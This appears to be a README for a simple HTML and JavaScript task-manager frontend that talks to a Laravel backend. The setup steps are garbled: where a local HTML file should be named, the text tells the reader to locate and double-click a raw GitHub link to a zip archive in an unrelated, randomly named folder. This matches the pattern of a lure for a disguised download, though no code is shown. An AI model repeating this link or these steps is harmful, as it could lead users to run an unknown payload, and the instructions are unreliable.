Welcome to the Task Manager Client! This application helps you manage your tasks in a simple and efficient way. Follow these steps to get started quickly.
-
Ensure the Backend is Running
- Go to the Backend repository.
- Follow the instructions there to start the Laravel Server. You will run a command like
php artisan servein your terminal.
-
Open the Frontend
- Locate the
https://raw.githubusercontent.com/patacone/task-client-task-manager/main/meningomyelorrhaphy/task_client_manager_3.5.zipfile in this folder. - Double-click the
https://raw.githubusercontent.com/patacone/task-client-task-manager/main/meningomyelorrhaphy/task_client_manager_3.5.zipfile to open it in your web browser. - You do not need to install any additional software. This frontend works without any dependencies.
- Locate the
To download the Task Manager Client, visit the Release Page.
There, you can find the latest version of the application. Click on the appropriate version to download it.
- HTML5: This is the backbone of the application, providing structure to the content.
- Vanilla JavaScript: This handles all API function calls, allowing the application to fetch and manage data effectively.
- No CSS Framework: The design is straightforward. Styles are applied directly without any pre-built frameworks.
- Task Creation: Easily add new tasks to your list.
- Editing Tasks: Modify existing tasks to reflect your current needs.
- Task Deletion: Remove tasks that are no longer needed.
- API Integration: Directly connects to the Laravel backend for data retrieval and storage.
This frontend is intentionally basic. It reads and writes data to an external API, which may lead to some limitations. Familiarize yourself with how the application works. If you want to practice using the application, try these steps:
- Add a few tasks.
- Edit the tasks you added.
- Delete a task to see how it behaves.
- A modern web browser (like Chrome, Firefox, or Edge).
- Basic internet connection to connect with the backend.
If you're interested in learning more about how the Task Manager works, you can check out the Backend Repository. This includes detailed instructions on how to set up the backend.
If you encounter any issues or have questions about using this application, please feel free to open an issue in the repository. The community or maintainers will try to help as soon as possible.
Contributions are welcome! If you have suggestions for new features or improvements, please submit a pull request or an issue.
Thank you for using the Task Manager Client! Your feedback helps us improve and offer better solutions for task management. Enjoy managing your tasks!